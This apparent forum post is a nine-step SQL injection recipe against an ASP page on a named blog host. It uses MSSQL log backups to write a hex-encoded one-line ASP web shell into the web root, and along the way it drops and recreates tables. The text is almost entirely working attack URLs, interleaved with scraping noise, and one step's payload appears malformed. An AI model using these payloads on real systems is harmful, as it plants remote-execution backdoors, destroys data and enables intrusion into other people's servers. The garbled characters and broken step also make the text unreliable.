第一步
, R% ~7 i5 y% ~9 X2 x7 Dhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
( T4 B6 Z+ @- h4 {1 V# X: H
: p2 k$ ^9 ^ o, P. R( X第二步: D8 w7 L) g1 p& Y L: m( v( d
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
1 L' J2 s+ E; B( l8 P% p: U' p% C8 W2 x0 \" D, w6 Y( x. d: K
第三步2 X9 y, S# h& H3 I4 u
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
# y2 [7 n. m- T- C1 |5 T! H6 Y4 S
% [0 n- c+ N3 E: x第四步
& z, i$ Z5 o8 }$ _! X( Ahttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--9 Z" K& t4 s/ S) c! V" v. G- c
# y: g7 v5 K# Q3 m- C第五步
+ b# _/ A9 z l/ L: r! g' bhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
" h4 r) P: L" V/ X
- r" O# C/ r* v O, j! ^; k& o第六步
' b0 `& g" I' ^4 ?1 H! F h/ }! xhttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
9 K9 b6 w0 I$ I S/ B$ y" s5 o& y/ F: O0 v' O
第七步
* J3 ?7 w& K$ y4 khttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--$ l; y% ]$ P9 k
) j/ U- G. q; k& K, O+ ~第八步
; ]! O5 `5 V( ]& b5 Dhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--4 J: a, R/ W" n% ?& b# |
" e( b: Q2 @ z% j第九步$ R* _* V2 Z$ D8 Q4 e* A) ?) N
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--; x7 D& p* |2 w6 z" t& z
|